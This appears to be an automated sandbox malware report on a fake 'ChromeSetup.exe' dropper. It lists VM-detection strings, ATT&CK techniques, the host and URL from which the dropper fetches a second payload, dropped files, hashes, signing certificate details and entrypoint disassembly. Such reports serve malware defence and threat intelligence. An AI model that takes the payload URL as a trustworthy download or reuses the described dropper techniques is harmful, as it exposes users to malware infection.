Source: Amcache.hve.11.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.11.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00007FF77525B810 HeapAlloc,GetProcessHeap,HeapAlloc,

0_2_00007FF77525B810

Source: C:\Users\user\Desktop\ChromeSetup.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\pluginmeet.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\pluginmeet.exe VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00007FF77527CDA0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF77527CDA0

Source: Amcache.hve.11.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.LOG1.11.dr, Amcache.hve.11.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.11.dr, Amcache.hve.11.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.LOG1.11.dr, Amcache.hve.11.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00007FF775267630 getsockname,WSAGetLastError,bind,WSAGetLastError,closesocket,

0_2_00007FF775267630

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ChromeSetup.exe	19%	Virustotal		Browse
ChromeSetup.exe	13%	ReversingLabs	Win64.Trojan.BadCert

Source	Detection	Scanner	Label
http://v128235.hostnl03.fornex.host/pluginmeet.exes	0%	Avira URL Cloud	safe
http://v128235.hostnl03.fornex.host/pluginmeet.exe	0%	Avira URL Cloud	safe
http://v128235.hostnl03.fornex.host/pluginmeet.exeG	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
v128235.hostnl03.fornex.host	185.18.52.66	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://cevcsca2021.ocsp-certum.com07	ChromeSetup.exe	false		high
https://fornex.com/dedicated/	ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	false		high
https://fornex.com/backup/	ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	false		high
https://fornex.com/help/transfer-site/	ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	false		high
https://fornex.com/help/cpanel-first	ChromeSetup.exe, 00000000.00000002.1719046578.0000000EC07EB000.00000004.00000010.00020000.00000000.sdmp	false		high
https://fornex.com/my/tickets/	ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	false		high
https://fornex.com/ssd-hosting/	ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	false		high
https://fornex.com/vpn/	ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	false		high
https://fornex.com/ssd-vps/	ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	false		high
http://subca.ocsp-certum.com02	ChromeSetup.exe	false		high
https://fornex.com/	pluginmeet.exe.0.dr	false		high
https://fornex.com/help/faq/	ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	false		high
http://crl.certum.pl/ctnca2.crl0l	ChromeSetup.exe	false		high
http://repository.certum.pl/ctnca2.cer09	ChromeSetup.exe	false		high
http://upx.sf.net	Amcache.hve.11.dr	false		high
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w	ChromeSetup.exe	false		high
http://v128235.hostnl03.fornex.host/pluginmeet.exeG	ChromeSetup.exe, 00000000.00000002.1719320385.000001131631F000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000000.00000003.1328237733.000001131631E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.certum.pl/CPS0	ChromeSetup.exe	false		high
http://v128235.hostnl03.fornex.host/pluginmeet.exe	ChromeSetup.exe, 00000000.00000002.1719320385.000001131631F000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000000.00000003.1328237733.000001131631E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.certum.pl/cevcsca2021.cer0	ChromeSetup.exe	false		high
http://v128235.hostnl03.fornex.host/pluginmeet.exes	ChromeSetup.exe, 00000000.00000002.1719320385.000001131631F000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000000.00000003.1328237733.000001131631E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.certum.pl/CPS0	ChromeSetup.exe	false		high
https://fornex.com/help/cpanel-first-steps/	ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.18.52.66	v128235.hostnl03.fornex.host	Spain		49981	WORLDSTREAMNL	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632177
Start date and time:	2025-03-07 20:30:45 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ChromeSetup.exe
Detection:	MAL
Classification:	mal42.winEXE@3/7@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.92.180.205, 23.199.214.10, 40.126.32.74
Excluded domains from analysis (whitelisted): onedsblobvmssprdeus04.eastus.cloudapp.azure.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.18.52.66	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	/pluginmeet.exe
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	/pluginmeet.exe
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	/pluginmeet.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
v128235.hostnl03.fornex.host	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.85
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.85
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.66
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.66
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.85
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.66

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WORLDSTREAMNL	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.85
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.85
	HmngBpR.exe	Get hash	malicious	Unknown	Browse	185.183.32.103
	mQRr8Rkorf.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	185.183.32.103
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.66
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.66
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.85
	PluginRequirements.exe	Get hash	malicious	Unknown	Browse	185.18.52.66
	5r3fqt67ew531has4231.arm.elf	Get hash	malicious	Mirai, Okiru	Browse	217.23.10.13

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ChromeSetup.exe_6ada18b8e09e59e4341ac527b486b7b596f33d_8feb169d_ce6762b6-5b34-4f6a-b313-708b89f4b992\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9030093568183696
Encrypted:	false
SSDEEP:	192:WJmX/Qoh0l57fFhFjNuEzuiF/Z24lO8k:0mX/Qoil57NTjxzuiF/Y4lO8k
MD5:	0C0A7A94E9CA4438E1799916C7D636C0
SHA1:	ABE50A04FD81E71CD657F64B95536D4045C080B3
SHA-256:	1B3F33AC76EE80AB50AB0BF63A55ECCDD05760CFC389CE49131B4D6E34CFBBBB
SHA-512:	D36E1B3AAC05165A335FCFBC49F99F7B46EE15052C7FF30CE1E558041835F22D95C368B2F76F1B0A6DBDBB03347504A63B7A203BBECC7F6C20CB1982EA8D6F62
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.5.8.4.9.5.1.5.7.0.6.5.3.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.5.8.4.9.5.1.6.1.2.8.4.0.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.6.7.6.2.b.6.-.5.b.3.4.-.4.f.6.a.-.b.3.1.3.-.7.0.8.b.8.9.f.4.b.9.9.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.4.5.0.d.6.5.-.5.c.4.d.-.4.f.0.2.-.a.7.a.2.-.8.d.2.1.e.a.4.a.2.5.7.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.C.h.r.o.m.e.S.e.t.u.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.8.0.-.0.0.0.1.-.0.0.1.9.-.3.9.1.5.-.3.0.8.e.9.7.8.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.0.6.3.6.1.2.6.d.2.5.f.5.3.8.e.d.e.a.f.e.a.9.9.3.c.e.0.b.1.f.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.2.4.f.2.9.a.f.d.8.d.e.6.3.8.1.0.1.7.a.4.2.2.a.e.3.3.2.0.2.2.d.b.d.2.3.1.2.b.4.!.C.h.r.o.m.e.S.e.t.u.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.3.:.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7847.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Mar 7 19:31:55 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	91822
Entropy (8bit):	1.4430359101366903
Encrypted:	false
SSDEEP:	192:JElmdSOxJowcf58ynzZIsnxRIdWXiAUOX2mvkmUQwUJJzHz8eT:i6txyRnzTxRzXxjVvkmUQwUJ9t
MD5:	199C4168FB5FC895E22AB74425DFF351
SHA1:	9FC0B7B1555F7B3655D4E4ACA4A1720BB7AED111
SHA-256:	FA4007A30A15176879369FD14E44599D04FC717F9F562F02271AE50A132584A1
SHA-512:	EAA7C65795E7B4BB4F0BE91B77DC4C656ABB623DB634FA8397EF643815736021A57A321522ECFC20188B775C22947D352C302B4DDCEE97D72A5E4D03C9C37145
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........I.g............$...........P...8............B..........`.......8...........T................J......................t...........................................................................................eJ..............Lw......................T............I.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7922.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	3.706321606804432
Encrypted:	false
SSDEEP:	192:R6l7wVeJK26u6YZ0743d/LgmfHvUuUhpDP89bZNDGmfqTm:R6lXJ76u6YK7+d/LgmfHvvtZpfn
MD5:	3FF204918CF303D2701132F262AC845D
SHA1:	D6DAFB311DFCB702B4B40AF8759818E33D57024C
SHA-256:	CA9F9DD605F6D5D0705713FC8909332AF3BA0A91489EF395B9414014D31E3B94
SHA-512:	50F4D2711F67E208173B0A79347746B2AFE1859970DAD33D0272479CE39E26E473551B018453BD6C3C0C1C1F4826750DD9C12616CFAF483711E55E7BBA979E34
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7952.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4776
Entropy (8bit):	4.448284932389125
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZJg771I9pWWpW8VYMYm8M4JiDF32yq8vwbccmnKrVBd:uIjfrI7K37VIJ1WsccGKrVBd
MD5:	24E6F4EA5FE055446DBEEEC222DC5F58
SHA1:	361091791CBDBA5696EFF0EC56235DED4EF0A412
SHA-256:	9B7555CA7EC953B4F248FD39165D7D141145BF4BA94714A7454D7FC1CC711C8E
SHA-512:	1F46E0D72629E6613900278DFB161B4DE5C56A60F6E14B2F5B1DDED3282C362133D7520A7C843665871322BB4326621753CFE65AF7E3F6746F2D2A8C6EC043BD
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="750874" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\pluginmeet.exe

Download File

Process:	C:\Users\user\Desktop\ChromeSetup.exe
File Type:	HTML document, Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	4856
Entropy (8bit):	4.407105513600241
Encrypted:	false
SSDEEP:	96:HMn+u3SVQE2+WRWkEWHjgSpR9X05R4HuCKM:HAe9UjVE5R4HuCKM
MD5:	3ACD9B76299B4DF811BC1ED96CC03117
SHA1:	B02BAAC62AE23A4B59186755C2DCBDDD36377B02
SHA-256:	8CD38ED3ADE213F85811989BFD4DDE1857F2426528830464464DF53F4288C257
SHA-512:	995027ECF23F64838692322F8ADC0F0B7D468A9009050748808915442D3E4B17C1887399366B5FAED61621E084E91F70887DB371CDBB19D5F0D631C0DC35FC27
Malicious:	false
Reputation:	low
Preview:	<!doctype html>.<html>..<head>. <title>404: ........ .. .......</title>. <meta charset="utf-8" />. <meta name="viewport" content="width=device-width" />. <link href="/static-fornex-custom/css/base.css" rel="stylesheet" />.</head>..<body>. <header class="header header-bg">. <div style="background-image: url('/static-fornex-custom/img/prlx-bg-main.png');" class="header-bg-image hdn-lg"></div>. <div class="wrap">. <div class="header-inner">. <div class="table">. <div class="left-nav table-cell-md">. <a href="https://fornex.com/"><img src="/static-fornex-custom/img/logo.png". srcset="/static-fornex-custom/img/logo@2x.png 2x" class="logo logo-light" /></a><a. href="https://fornex.com/"><img src="/static-fornex-custom/img/logo-dark.png". srcset="/static-fornex-custom/img/logo-dark@2x.png 2x" class="logo logo-dark" /></a>. </div>. <div class="center-nav table-cell-md hdn-lg

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.473386722332634
Encrypted:	false
SSDEEP:	6144:B9Zfpi6ceLPx9skLmb0fvZWSP3aJG8nAge03BQqZaKFFIeC/DNcXCtdLrI:vZHtvZWOcxQqYzruytC
MD5:	C8E04076C4B1D8D7BD9C11C6ADAFF166
SHA1:	349A5FCEB90FA6E288B446DB84E45C89DABC13F8
SHA-256:	68BC414746F90F36BC98F5FEFB3773944735E239D8866B24ACF81DDE743A2517
SHA-512:	34402B37D033B3184B36FCD9F3E604F5BBA23706ABBAE2B352F13A2D37CECB2E004B2101B22A74C3E21B4CF907A07558D4B17B50149926B642196CACE303CB1F
Malicious:	false
Reputation:	low
Preview:	regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[.d...............................................................................................................................................................................................................................................................................................................................................\|.M ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.9196558760674347
Encrypted:	false
SSDEEP:	768:yGHDoUrTjyutmUu/mRA6dzszO2qlo2ysUe6m0Q:yG6uMUu+NIrm8
MD5:	41C815F0FAC6C8952867441245465FEF
SHA1:	F199709CA84775A6021E76725090F5E19105E0AE
SHA-256:	ADB9A85D798335E2FAEC75DBF453C406B15E810BFFBE86D162AACF9F3596933A
SHA-512:	457F78AE083EB1ED1FC3318F456A0A281266A9303740392666C11492BEC655E4831782D2E64438DD4A0BB2B8E2058E37C36F1E0B504608F77BAA3032B1D84EBD
Malicious:	false
Preview:	regfK...K....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[.d...............................................................................................................................................................................................................................................................................................................................................z.M HvLE.n......K...........Ws.xD...S/....G..................................... ..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........^...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.166697077752854
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ChromeSetup.exe
File size:	2'172'168 bytes
MD5:	3dadab41987ce43aeca0c09430f0a38a
SHA1:	f24f29afd8de6381017a422ae332022dbd2312b4
SHA256:	0b44a1854f9dc2eab5625dffc1ceb17b1e89773c9ee04802a2f40dfd834dec2c
SHA512:	0fa71624e9acca7ebe0da860033bef634d51e418d4bfb2a6be5671d92130c1e52dd5decd5ac66f3fcafc1f72c6fc208b451ba4576bca9e94ceb078985867802c
SSDEEP:	24576:7M7eJvXPazi4Rq+FDgPLpdH+vxLzyJq7PgPYSc4JBo1FqQn652nBsewy:78ehXPazi4RrvxLuJIPgwSc4no1FRwS
TLSH:	8DA54A52F78549EEC429C1B48247A732BA71B84D4734BBEB4B9486723E15FD06F3C298
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b2...a...a...a...`...a...`M..a...`...a...`...a...`...a...`...a...a...a...a7..a...`...aRich...a........................PE..d..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x14013cb20
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FEDF4F [Thu Oct 3 18:15:43 2024 UTC]
TLS Callbacks:	0x40127090, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d52fe9cc2c19043b6e8a1ebec00b92bc

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	27/09/2024 03:50:46 27/09/2025 03:50:45
Subject Chain	CN="Hangzhou Rongyi Network Technology Co., Ltd.", O="Hangzhou Rongyi Network Technology Co., Ltd.", L=Hangzhou, S=Zhejiang, C=CN, SERIALNUMBER=91330185MA280YDY16, OID.1.3.6.1.4.1.311.60.2.1.1=Hangzhou, OID.1.3.6.1.4.1.311.60.2.1.2=Zhejiang, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	6EFE56417198636548A7A342151A4DE6
Thumbprint SHA-1:	DCC865C6DD9EA2318439F207ACBC2AC0797FB51B
Thumbprint SHA-256:	77FC563CABFD503F4387F0903ED6B592C41D5D9B7EE0270DFFBE60641C479C52
Serial:	1616F14FBA9C87AB97AD25861EE7A9DC

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FDC44E82A2Ch
dec eax
add esp, 28h
jmp 00007FDC44E82627h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
lea eax, dword ptr [000B004Fh]
dec eax
mov ebx, ecx
dec eax
mov dword ptr [ecx], eax
test dl, 00000001h
je 00007FDC44E827BCh
mov edx, 00000018h
call 00007FDC44E82DAFh
dec eax
mov eax, ebx
dec eax
add esp, 20h
pop ebx
ret
int3
dec eax
sub esp, 28h
call 00007FDC44E83070h
test eax, eax
je 00007FDC44E827D3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007FDC44E827B7h
dec eax
cmp ecx, eax
je 00007FDC44E827C6h
xor eax, eax
dec eax
cmpxchg dword ptr [000C6FB4h], ecx
jne 00007FDC44E827A0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007FDC44E827A9h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007FDC44E827B9h
